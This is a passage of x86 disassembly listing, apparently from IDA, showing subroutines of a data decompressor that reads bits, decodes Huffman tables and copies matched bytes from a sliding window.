arg_4 = dword ptr 8
push ecx
push ebx
mov ebx, [esp+8+arg_4]
push ebp
mov ebp, [esp+0Ch+arg_0]
push esi
push edi
xor edi, edi
xor esi, esi
cmp ebx, edi
mov [esp+14h+var_4], esi
jle loc_10059E7
loc_1005814: ; CODE XREF: sub_10057F7:loc_10059DD�j
cmp dword ptr [ebp+2EDCh], 1
jnz loc_10059B7
lea eax, [ebp+2EB8h]
cmp [eax], edi
jz short loc_100585E
push 1
push ebp
mov [eax], edi
call sub_1005B04
test eax, eax
jz short loc_1005858
push 10h
push ebp
call sub_1005B04
push 10h
push ebp
mov esi, eax
call sub_1005B04
shl esi, 10h
or eax, esi
mov [ebp+2EC4h], eax
jmp short loc_100585E
; ---------------------------------------------------------------------------
loc_1005858: ; CODE XREF: sub_10057F7+40�j
mov [ebp+2EC4h], edi
loc_100585E: ; CODE XREF: sub_10057F7+32�j
; sub_10057F7+5F�j
cmp dword ptr [ebp+2ED8h], 3
jnz short loc_100588F
test byte ptr [ebp+2ED0h], 1
jz short loc_1005883
lea eax, [ebp+2B04h]
mov ecx, [eax]
cmp ecx, [ebp+2B08h]
jnb short loc_1005883
inc ecx
mov [eax], ecx
loc_1005883: ; CODE XREF: sub_10057F7+77�j
; sub_10057F7+87�j
push ebp
mov [ebp+2ED8h], edi
call sub_1005A0B
loc_100588F: ; CODE XREF: sub_10057F7+6E�j
push 3
push ebp
call sub_1005B04
push 8
push ebp
mov [ebp+2ED8h], eax
call sub_1005B04
push 8
push ebp
mov esi, eax
call sub_1005B04
push 8
push ebp
mov edi, eax
call sub_1005B04
shl esi, 8
add esi, edi
shl esi, 8
add eax, esi
cmp dword ptr [ebp+2ED8h], 2
mov [ebp+2ED0h], eax
mov [ebp+2ED4h], eax
jnz short loc_10058DE
push ebp
call sub_1006A2F
loc_10058DE: ; CODE XREF: sub_10057F7+DF�j
mov eax, [ebp+2ED8h]
cmp eax, 1
jz short loc_1005905
cmp eax, 2
jz short loc_1005905
cmp eax, 3
jnz short loc_10058FD
push ebp
call sub_1005BA6
test eax, eax
jnz short loc_1005945
loc_10058FD: ; CODE XREF: sub_10057F7+FA�j
; sub_10057F7+16E�j ...
or eax, 0FFFFFFFFh
jmp loc_1005A03
; ---------------------------------------------------------------------------
loc_1005905: ; CODE XREF: sub_10057F7+F0�j
; sub_10057F7+F5�j
movzx ecx, byte ptr [ebp+2EB5h]
lea ecx, ds:100h[ecx*8]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+0A18h]
lea edi, [ebp+2B14h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 3Eh
pop ecx
lea esi, [ebp+0CB8h]
lea edi, [ebp+2DB4h]
rep movsd
push ebp
movsb
call sub_1006978
loc_1005945: ; CODE XREF: sub_10057F7+104�j
mov dword ptr [ebp+2EDCh], 2
xor edi, edi
jmp short loc_10059B7
; ---------------------------------------------------------------------------
loc_1005953: ; CODE XREF: sub_10057F7+1C6�j
cmp ebx, edi
jle short loc_10059BF
mov esi, [ebp+2ED4h]
cmp esi, ebx
jl short loc_1005963
mov esi, ebx
loc_1005963: ; CODE XREF: sub_10057F7+168�j
cmp esi, edi
jz short loc_10058FD
mov ecx, [ebp+2ED8h]
cmp ecx, 2
mov eax, [ebp+2EC0h]
jnz short loc_1005982
push esi
push eax
push ebp
call sub_10066D5
jmp short loc_10059A3
; ---------------------------------------------------------------------------
loc_1005982: ; CODE XREF: sub_10057F7+17F�j
cmp ecx, 1
jnz short loc_1005991
push esi
push eax
push ebp
call sub_100609F
jmp short loc_10059A3
; ---------------------------------------------------------------------------
loc_1005991: ; CODE XREF: sub_10057F7+18E�j
cmp ecx, 3
jnz short loc_10059A0
push esi
push eax
push ebp
call sub_1005B28
jmp short loc_10059A3
; ---------------------------------------------------------------------------
loc_10059A0: ; CODE XREF: sub_10057F7+19D�j
or eax, 0FFFFFFFFh
loc_10059A3: ; CODE XREF: sub_10057F7+189�j
; sub_10057F7+198�j ...
cmp eax, edi
jnz loc_10058FD
sub [ebp+2ED4h], esi
sub ebx, esi
add [esp+14h+var_4], esi
loc_10059B7: ; CODE XREF: sub_10057F7+24�j
; sub_10057F7+15A�j
cmp [ebp+2ED4h], edi
jg short loc_1005953
loc_10059BF: ; CODE XREF: sub_10057F7+15E�j
cmp [ebp+2ED4h], edi
jnz short loc_10059D1
mov dword ptr [ebp+2EDCh], 1
loc_10059D1: ; CODE XREF: sub_10057F7+1CE�j
cmp ebx, edi
jnz short loc_10059DD
push ebp
call sub_1005A0B
cmp ebx, edi
loc_10059DD: ; CODE XREF: sub_10057F7+1DC�j
jg loc_1005814
mov esi, [esp+14h+var_4]
loc_10059E7: ; CODE XREF: sub_10057F7+17�j
mov eax, [ebp+2EC0h]
cmp eax, edi
jnz short loc_10059F4
mov eax, [ebp+4]
loc_10059F4: ; CODE XREF: sub_10057F7+1F8�j
sub eax, esi
add eax, [ebp+0]
push eax
push esi
push ebp
call sub_1006720
mov eax, esi
loc_1005A03: ; CODE XREF: sub_10057F7+109�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
sub_10057F7 endp
; =============== S U B R O U T I N E =======================================
sub_1005A0B proc near ; CODE XREF: sub_10057F7+93�p
; sub_10057F7+1DF�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp dword ptr [ecx+2ED8h], 3
jz short locret_1005A59
mov eax, [ecx+2B04h]
push esi
lea esi, [eax+4]
cmp esi, [ecx+2B08h]
ja short loc_1005A58
xor edx, edx
mov dh, [eax+1]
push edi
movzx edi, byte ptr [eax+3]
mov dl, [eax]
movzx eax, byte ptr [eax+2]
mov byte ptr [ecx+2EB4h], 10h
mov [ecx+2B04h], esi
shl edx, 8
or edx, edi
shl edx, 8
or edx, eax
mov [ecx+2EB0h], edx
pop edi
loc_1005A58: ; CODE XREF: sub_1005A0B+1D�j
pop esi
locret_1005A59: ; CODE XREF: sub_1005A0B+B�j
retn 4
sub_1005A0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1005A5C proc near ; CODE XREF: sub_100554A+27�p
jmp sub_1005A0B
sub_1005A5C endp
; =============== S U B R O U T I N E =======================================
sub_1005A61 proc near ; CODE XREF: sub_1005B04+19�p
; sub_100676D+AC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub [eax+2EB4h], cl
shl dword ptr [eax+2EB0h], cl
mov dl, [eax+2EB4h]
test dl, dl
push edi
mov edi, [eax+2EB0h]
jg short loc_1005B00
push ebx
push esi
mov esi, [eax+2B04h]
cmp esi, [eax+2B08h]
jb short loc_1005AA2
loc_1005A96: ; CODE XREF: sub_1005A61+74�j
mov dword ptr [eax+2EBCh], 1
jmp short loc_1005AFE
; ---------------------------------------------------------------------------
loc_1005AA2: ; CODE XREF: sub_1005A61+33�j
xor ebx, ebx
mov bh, [esi+1]
xor ecx, ecx
mov cl, dl
add dl, 10h
mov bl, [esi]
add esi, 2
neg ecx
mov [eax+2B04h], esi
mov [eax+2EB4h], dl
shl ebx, cl
or ebx, edi
test dl, dl
mov [eax+2EB0h], ebx
jg short loc_1005AFE
cmp esi, [eax+2B08h]
jnb short loc_1005A96
xor ebx, ebx
mov bh, [esi+1]
xor ecx, ecx
mov cl, dl
mov bl, [esi]
add esi, 2
neg ecx
mov [eax+2B04h], esi
shl ebx, cl
or [eax+2EB0h], ebx
add dl, 10h
mov [eax+2EB4h], dl
loc_1005AFE: ; CODE XREF: sub_1005A61+3F�j
; sub_1005A61+6C�j
pop esi
pop ebx
loc_1005B00: ; CODE XREF: sub_1005A61+23�j
pop edi
retn 8
sub_1005A61 endp
; =============== S U B R O U T I N E =======================================
sub_1005B04 proc near ; CODE XREF: sub_10057F7+39�p
; sub_10057F7+45�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, [eax+2EB0h]
push 20h
pop ecx
push [esp+4+arg_4]
sub ecx, [esp+8+arg_4]
push eax
shr esi, cl
call sub_1005A61
mov eax, esi
pop esi
retn 8
sub_1005B04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005B28 proc near ; CODE XREF: sub_10057F7+1A2�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov edx, [ecx+2B04h]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
lea edi, [esi+eax]
cmp esi, edi
mov ebx, esi
mov [ebp+arg_4], ebx
jge short loc_1005B61
loc_1005B49: ; CODE XREF: sub_1005B28+34�j
cmp edx, [ecx+2B08h]
jnb short loc_1005B78
mov bl, [edx]
mov eax, [ecx]
mov [esi+eax], bl
inc esi
inc edx
cmp esi, edi
jl short loc_1005B49
mov ebx, [ebp+arg_4]
loc_1005B61: ; CODE XREF: sub_1005B28+1F�j
mov eax, 101h
cmp edi, eax
mov [ecx+2B04h], edx
mov [ebp+arg_4], eax
jg short loc_1005B8B
mov [ebp+arg_4], edi
jmp short loc_1005B8B
; ---------------------------------------------------------------------------
loc_1005B78: ; CODE XREF: sub_1005B28+27�j
or eax, 0FFFFFFFFh
jmp short loc_1005B9F
; ---------------------------------------------------------------------------
loc_1005B7D: ; CODE XREF: sub_1005B28+66�j
mov eax, [ecx]
mov edx, [ecx+4]
add edx, eax
mov al, [eax+ebx]
mov [edx+ebx], al
inc ebx
loc_1005B8B: ; CODE XREF: sub_1005B28+49�j
; sub_1005B28+4E�j
cmp ebx, [ebp+arg_4]
jb short loc_1005B7D
mov eax, [ecx+8]
and eax, esi
mov [ecx+2EC0h], eax
mov eax, esi
sub eax, edi
loc_1005B9F: ; CODE XREF: sub_1005B28+53�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_1005B28 endp
; =============== S U B R O U T I N E =======================================
sub_1005BA6 proc near ; CODE XREF: sub_10057F7+FD�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax+2B04h], 0FFFFFFFEh
mov ecx, [eax+2B04h]
add ecx, 4
cmp ecx, [eax+2B08h]
jb short loc_1005BC6
xor eax, eax
jmp short locret_1005C03
; ---------------------------------------------------------------------------
loc_1005BC6: ; CODE XREF: sub_1005BA6+1A�j
push ebx
push esi
push edi
push 3
lea esi, [eax+0Ch]
pop edi
loc_1005BCF: ; CODE XREF: sub_1005BA6+55�j
mov ecx, [eax+2B04h]
movzx ebx, byte ptr [ecx+1]
xor edx, edx
mov dh, [ecx+3]
mov dl, [ecx+2]
movzx ecx, byte ptr [ecx]
shl edx, 8
or edx, ebx
shl edx, 8
or edx, ecx
mov [esi], edx
add dword ptr [eax+2B04h], 4
add esi, 4
dec edi
jnz short loc_1005BCF
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
locret_1005C03: ; CODE XREF: sub_1005BA6+1E�j
retn 4
sub_1005BA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005C06 proc near ; CODE XREF: sub_100609F+1F�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov al, [edx+2EB4h]
push ebx
mov ebx, [edx+2B08h]
mov [ebp+var_C], ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [edx+2EB0h]
add ebx, ecx
cmp ecx, ebx
push edi
mov edi, [edx+2B04h]
mov [ebp+var_14], ebx
jge loc_1005E3D
loc_1005C3D: ; CODE XREF: sub_1005C06+231�j
mov ecx, esi
shr ecx, 16h
movsx ebx, word ptr [edx+ecx*2+18h]
test ebx, ebx
jge short loc_1005C6E
mov ecx, 200000h
loc_1005C50: ; CODE XREF: sub_1005C06+66�j
neg ebx
test ecx, esi
jz short loc_1005C60
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1005C68
; ---------------------------------------------------------------------------
loc_1005C60: ; CODE XREF: sub_1005C06+4E�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1005C68: ; CODE XREF: sub_1005C06+58�j
shr ecx, 1
test ebx, ebx
jl short loc_1005C50
loc_1005C6E: ; CODE XREF: sub_1005C06+43�j
cmp edi, [ebp+var_C]
jnb loc_1005E58
mov cl, [ebx+edx+0A18h]
shl esi, cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
mov [ebp+var_4], esi
jg short loc_1005CAE
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_8], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_8]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
mov byte ptr [ebp+arg_4+3], al
loc_1005CAE: ; CODE XREF: sub_1005C06+84�j
sub ebx, 100h
jns short loc_1005CCC
mov esi, [edx]
mov ecx, [ebp+arg_0]
mov [ecx+esi], bl
mov esi, [edx+4]
add esi, [edx]
mov [esi+ecx], bl
inc ecx
jmp loc_1005E2E
; ---------------------------------------------------------------------------
loc_1005CCC: ; CODE XREF: sub_1005C06+AE�j
mov ecx, ebx
and ecx, 7
cmp ecx, 7
mov [ebp+var_8], ecx
jnz short loc_1005D4F
mov ecx, [ebp+var_4]
mov eax, ecx
shr eax, 18h
movsx esi, word ptr [edx+eax*2+818h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1005D16
mov eax, 800000h
loc_1005CF5: ; CODE XREF: sub_1005C06+10B�j
neg esi
test eax, ecx
jz short loc_1005D05
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_1005D0D
; ---------------------------------------------------------------------------
loc_1005D05: ; CODE XREF: sub_1005C06+F3�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_1005D0D: ; CODE XREF: sub_1005C06+FD�j
shr eax, 1
test esi, esi
jl short loc_1005CF5
mov [ebp+var_8], esi
loc_1005D16: ; CODE XREF: sub_1005C06+E8�j
mov cl, [esi+edx+0CB8h]
mov al, byte ptr [ebp+arg_4+3]
shl [ebp+var_4], cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
jg short loc_1005D4B
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_10], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_10]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
loc_1005D4B: ; CODE XREF: sub_1005C06+124�j
add [ebp+var_8], 7
loc_1005D4F: ; CODE XREF: sub_1005C06+D1�j
sar ebx, 3
cmp bl, 2
jle short loc_1005DD2
cmp bl, 3
jle short loc_1005DC1
mov esi, [ebp+var_4]
movsx ecx, bl
movzx ebx, ds:byte_1002278[ecx]
mov [ebp+arg_4], ecx
push 20h
pop ecx
sub ecx, ebx
shr esi, cl
mov ecx, ebx
shl [ebp+var_4], cl
mov ecx, [ebp+arg_4]
sub al, ds:byte_1002278[ecx]
test al, al
jg short loc_1005DB5
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
add al, 10h
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
test al, al
jg short loc_1005DB5
xor ebx, ebx
mov bh, [edi+1]
xor ecx, ecx
mov cl, al
mov bl, [edi]
neg ecx
shl ebx, cl
or [ebp+var_4], ebx
inc edi
inc edi
add al, 10h
loc_1005DB5: ; CODE XREF: sub_1005C06+17D�j
; sub_1005C06+197�j
mov ecx, [ebp+arg_4]
add esi, ds:dword_10022B0[ecx*4]
jmp short loc_1005DC4
; ---------------------------------------------------------------------------
loc_1005DC1: ; CODE XREF: sub_1005C06+154�j
xor esi, esi
inc esi
loc_1005DC4: ; CODE XREF: sub_1005C06+1B9�j
mov ecx, [edx+10h]
mov [edx+14h], ecx
mov ecx, [edx+0Ch]
mov [edx+10h], ecx
jmp short loc_1005DE4
; ---------------------------------------------------------------------------
loc_1005DD2: ; CODE XREF: sub_1005C06+14F�j
test bl, bl
movsx ecx, bl
lea ecx, [edx+ecx*4+0Ch]
mov esi, [ecx]
jz short loc_1005DE7
mov ebx, [edx+0Ch]
mov [ecx], ebx
loc_1005DE4: ; CODE XREF: sub_1005C06+1CA�j
mov [edx+0Ch], esi
loc_1005DE7: ; CODE XREF: sub_1005C06+1D7�j
mov ecx, [ebp+arg_0]
add [ebp+var_8], 2
mov ebx, ecx
sub ebx, esi
mov [ebp+arg_0], ebx
loc_1005DF5: ; CODE XREF: sub_1005C06+226�j
mov ebx, [edx+8]
mov esi, [edx]
and ebx, [ebp+arg_0]
cmp ecx, 101h
mov bl, [ebx+esi]
mov [ebp+arg_4], esi
mov [esi+ecx], bl
jge short loc_1005E21
mov esi, [edx]
mov ebx, [edx+4]
mov [ebp+arg_4], eax
mov al, [esi+ecx]
add ebx, esi
mov [ebx+ecx], al
mov eax, [ebp+arg_4]
loc_1005E21: ; CODE XREF: sub_1005C06+206�j
inc ecx
inc [ebp+arg_0]
dec [ebp+var_8]
cmp [ebp+var_8], 0
jg short loc_1005DF5
loc_1005E2E: ; CODE XREF: sub_1005C06+C1�j
cmp ecx, [ebp+var_14]
mov esi, [ebp+var_4]
mov [ebp+arg_0], ecx
jl loc_1005C3D
loc_1005E3D: ; CODE XREF: sub_1005C06+31�j
mov [edx+2EB4h], al
mov [edx+2EB0h], esi
mov [edx+2B04h], edi
mov eax, ecx
loc_1005E51: ; CODE XREF: sub_1005C06+255�j
pop edi
pop esi
pop ebx
leave
retn 8
; ---------------------------------------------------------------------------
loc_1005E58: ; CODE XREF: sub_1005C06+6B�j
or eax, 0FFFFFFFFh
jmp short loc_1005E51
sub_1005C06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1005E5D proc near ; CODE XREF: sub_100609F+41�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov edx, [ebp+arg_0]
mov al, [edx+2EB4h]
mov ecx, [ebp+arg_8]
mov byte ptr [ebp+arg_0+3], al
mov eax, [edx+2B08h]
push ebx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
push esi
mov esi, [edx+2B04h]
add ecx, eax
cmp eax, ecx
push edi
mov edi, [edx+2EB0h]
mov [ebp+var_8], ecx
jge loc_1006070
loc_1005E9A: ; CODE XREF: sub_1005E5D+20D�j
mov eax, edi
shr eax, 16h
movsx ebx, word ptr [edx+eax*2+18h]
test ebx, ebx
jge short loc_1005ECB
mov eax, 200000h
loc_1005EAD: ; CODE XREF: sub_1005E5D+6C�j
neg ebx
test eax, edi
jz short loc_1005EBD
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1005EC5
; ---------------------------------------------------------------------------
loc_1005EBD: ; CODE XREF: sub_1005E5D+54�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1005EC5: ; CODE XREF: sub_1005E5D+5E�j
shr eax, 1
test ebx, ebx
jl short loc_1005EAD
loc_1005ECB: ; CODE XREF: sub_1005E5D+49�j
cmp esi, [ebp+var_C]
jnb loc_100609A
mov cl, [ebx+edx+0A18h]
shl edi, cl
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
sub cl, [ebx+edx+0A18h]
mov [ebp+arg_8], edi
test cl, cl
mov byte ptr [ebp+arg_0+3], cl
jg short loc_1005F07
xor eax, eax
mov ah, [esi+1]
neg ecx
mov al, [esi]
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_1005F07: ; CODE XREF: sub_1005E5D+94�j
sub ebx, 100h
jns short loc_1005F1D
mov eax, [ebp+arg_4]
mov ecx, [edx]
mov [eax+ecx], bl
inc eax
jmp loc_1006061
; ---------------------------------------------------------------------------
loc_1005F1D: ; CODE XREF: sub_1005E5D+B0�j
mov eax, ebx
and eax, 7
cmp eax, 7
mov [ebp+var_4], eax
jnz short loc_1005F9D
mov eax, [ebp+arg_8]
shr eax, 18h
movsx edi, word ptr [edx+eax*2+818h]
test edi, edi
mov [ebp+var_4], edi
jge short loc_1005F68
mov eax, 800000h
loc_1005F44: ; CODE XREF: sub_1005E5D+106�j
mov ecx, [ebp+arg_8]
neg edi
test eax, ecx
jz short loc_1005F57
movsx edi, word ptr [edx+edi*4+233Eh]
jmp short loc_1005F5F
; ---------------------------------------------------------------------------
loc_1005F57: ; CODE XREF: sub_1005E5D+EE�j
movsx edi, word ptr [edx+edi*4+233Ch]
loc_1005F5F: ; CODE XREF: sub_1005E5D+F8�j
shr eax, 1
test edi, edi
jl short loc_1005F44
mov [ebp+var_4], edi
loc_1005F68: ; CODE XREF: sub_1005E5D+E0�j
mov cl, [edi+edx+0CB8h]
shl [ebp+arg_8], cl
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
sub cl, [edi+edx+0CB8h]
test cl, cl
mov byte ptr [ebp+arg_0+3], cl
jg short loc_1005F99
xor eax, eax
mov ah, [esi+1]
neg ecx
mov al, [esi]
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_1005F99: ; CODE XREF: sub_1005E5D+126�j
add [ebp+var_4], 7
loc_1005F9D: ; CODE XREF: sub_1005E5D+CB�j
sar ebx, 3
cmp bl, 2
jle loc_100602B
cmp bl, 3
jle short loc_1006017
mov edi, [ebp+arg_8]
movsx ebx, bl
movzx eax, ds:byte_1002278[ebx]
push 20h
pop ecx
sub ecx, eax
shr edi, cl
mov ecx, eax
mov al, ds:byte_1002278[ebx]
sub byte ptr [ebp+arg_0+3], al
shl [ebp+arg_8], cl
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100600E
xor eax, eax
mov ah, [esi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
add byte ptr [ebp+arg_0+3], 10h
mov al, [esi]
neg ecx
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
cmp byte ptr [ebp+arg_0+3], 0
jg short loc_100600E
xor eax, eax
mov ah, [esi+1]
xor ecx, ecx
mov cl, byte ptr [ebp+arg_0+3]
mov al, [esi]
neg ecx
shl eax, cl
or [ebp+arg_8], eax
inc esi
inc esi
add byte ptr [ebp+arg_0+3], 10h
loc_100600E: ; CODE XREF: sub_1005E5D+177�j
; sub_1005E5D+196�j
add edi, ds:dword_10022B0[ebx*4]
jmp short loc_100601D
; ---------------------------------------------------------------------------
loc_1006017: ; CODE XREF: sub_1005E5D+14F�j
mov edi, ds:dword_10022BC
loc_100601D: ; CODE XREF: sub_1005E5D+1B8�j
mov eax, [edx+10h]
mov [edx+14h], eax
mov eax, [edx+0Ch]
mov [edx+10h], eax
jmp short loc_100603D
; ---------------------------------------------------------------------------
loc_100602B: ; CODE XREF: sub_1005E5D+146�j
test bl, bl
movsx eax, bl
lea eax, [edx+eax*4+0Ch]
mov edi, [eax]
jz short loc_1006040
mov ecx, [edx+0Ch]
mov [eax], ecx
loc_100603D: ; CODE XREF: sub_1005E5D+1CC�j
mov [edx+0Ch], edi
loc_1006040: ; CODE XREF: sub_1005E5D+1D9�j
mov eax, [ebp+arg_4]
add [ebp+var_4], 2
mov ecx, eax
sub ecx, edi
and ecx, [edx+8]
loc_100604E: ; CODE XREF: sub_1005E5D+202�j
mov edi, [edx]
mov bl, [edi+ecx]
mov [edi+eax], bl
inc eax
inc ecx
dec [ebp+var_4]
cmp [ebp+var_4], 0
jg short loc_100604E
loc_1006061: ; CODE XREF: sub_1005E5D+BB�j
cmp eax, [ebp+var_8]
mov edi, [ebp+arg_8]
mov [ebp+arg_4], eax
jl loc_1005E9A
loc_1006070: ; CODE XREF: sub_1005E5D+37�j
mov cl, byte ptr [ebp+arg_0+3]
mov [edx+2EB4h], cl
mov ecx, [edx+8]
and ecx, eax
sub eax, [ebp+var_8]
mov [edx+2EB0h], edi
mov [edx+2B04h], esi
mov [edx+2EC0h], ecx
loc_1006093: ; CODE XREF: sub_1005E5D+240�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_100609A: ; CODE XREF: sub_1005E5D+71�j
or eax, 0FFFFFFFFh
jmp short loc_1006093
sub_1005E5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100609F proc near ; CODE XREF: sub_10057F7+193�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov eax, 101h
cmp esi, eax
jge short loc_10060DB
sub eax, esi
cmp eax, [ebp+arg_8]
jl short loc_10060BC
mov eax, [ebp+arg_8]
loc_10060BC: ; CODE XREF: sub_100609F+18�j
push eax
push esi
call sub_1005C06
sub esi, eax
add [ebp+arg_8], esi
cmp [ebp+arg_8], 0
mov esi, eax
mov [edx+2EC0h], eax
jg short loc_10060DB
mov eax, [ebp+arg_8]
jmp short loc_10060E5
; ---------------------------------------------------------------------------
loc_10060DB: ; CODE XREF: sub_100609F+11�j
; sub_100609F+35�j
push [ebp+arg_8]
push esi
push edx
call sub_1005E5D
loc_10060E5: ; CODE XREF: sub_100609F+3A�j
pop esi
pop ebp
retn 0Ch
sub_100609F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10060EA proc near ; CODE XREF: sub_10066D5+1F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, [ebp+arg_0]
mov al, [edx+2EB4h]
push ebx
mov ebx, [edx+2B08h]
mov [ebp+var_10], ebx
mov ebx, [edx]
mov [ebp+var_C], ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [edx+2EB0h]
add ebx, ecx
cmp ecx, ebx
push edi
mov edi, [edx+2B04h]
mov [ebp+var_18], ebx
jge loc_10063AA
loc_1006126: ; CODE XREF: sub_10060EA+2BA�j
mov ecx, esi
shr ecx, 16h
movsx ebx, word ptr [edx+ecx*2+18h]
test ebx, ebx
jge short loc_1006157
mov ecx, 200000h
loc_1006139: ; CODE XREF: sub_10060EA+6B�j
neg ebx
test ecx, esi
jz short loc_1006149
movsx ebx, word ptr [edx+ebx*4+0E3Eh]
jmp short loc_1006151
; ---------------------------------------------------------------------------
loc_1006149: ; CODE XREF: sub_10060EA+53�j
movsx ebx, word ptr [edx+ebx*4+0E3Ch]
loc_1006151: ; CODE XREF: sub_10060EA+5D�j
shr ecx, 1
test ebx, ebx
jl short loc_1006139
loc_1006157: ; CODE XREF: sub_10060EA+48�j
cmp edi, [ebp+var_10]
jnb loc_10063C5
mov cl, [ebx+edx+0A18h]
shl esi, cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
mov [ebp+var_4], esi
jg short loc_1006197
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_8], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_8]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
mov byte ptr [ebp+arg_4+3], al
loc_1006197: ; CODE XREF: sub_10060EA+89�j
sub ebx, 100h
jns short loc_10061B7
mov ecx, [ebp+arg_0]
mov esi, [ebp+var_C]
mov [esi+ecx], bl
mov esi, [edx+4]
add esi, [ebp+var_C]
mov [esi+ecx], bl
inc ecx
jmp loc_100639B
; ---------------------------------------------------------------------------
loc_10061B7: ; CODE XREF: sub_10060EA+B3�j
mov ecx, ebx
and ecx, 7
cmp ecx, 7
mov [ebp+var_8], ecx
jnz short loc_100623B
mov eax, [ebp+var_4]
shr eax, 18h
movsx esi, word ptr [edx+eax*2+818h]
test esi, esi
mov [ebp+var_8], esi
jge short loc_1006202
mov eax, 800000h
loc_10061DE: ; CODE XREF: sub_10060EA+113�j
mov ecx, [ebp+var_4]
neg esi
test eax, ecx
jz short loc_10061F1
movsx esi, word ptr [edx+esi*4+233Eh]
jmp short loc_10061F9
; ---------------------------------------------------------------------------
loc_10061F1: ; CODE XREF: sub_10060EA+FB�j
movsx esi, word ptr [edx+esi*4+233Ch]
loc_10061F9: ; CODE XREF: sub_10060EA+105�j
shr eax, 1
test esi, esi
jl short loc_10061DE
mov [ebp+var_8], esi
loc_1006202: ; CODE XREF: sub_10060EA+ED�j
mov cl, [esi+edx+0CB8h]
mov al, byte ptr [ebp+arg_4+3]
shl [ebp+var_4], cl
sub al, cl
test al, al
mov byte ptr [ebp+arg_4+3], al
jg short loc_1006237
xor ecx, ecx
mov ch, [edi+1]
mov cl, [edi]
mov [ebp+var_14], ecx
xor ecx, ecx
mov cl, al
mov eax, [ebp+var_14]
neg ecx
shl eax, cl
or [ebp+var_4], eax
mov al, byte ptr [ebp+arg_4+3]
inc edi
inc edi
add al, 10h
loc_1006237: ; CODE XREF: sub_10060EA+12C�j
add [ebp+var_8], 7
loc_100623B: ; CODE XREF: sub_10060EA+D8�j
sar ebx, 3
cmp bl, 2
movsx ecx, bl
jle loc_1006348
mov [ebp+arg_4], ecx
mov cl, ds:byte_1002278[ecx]
cmp cl, 3
jb loc_10062F2
movzx ebx, cl
lea ecx, [ebx-3]
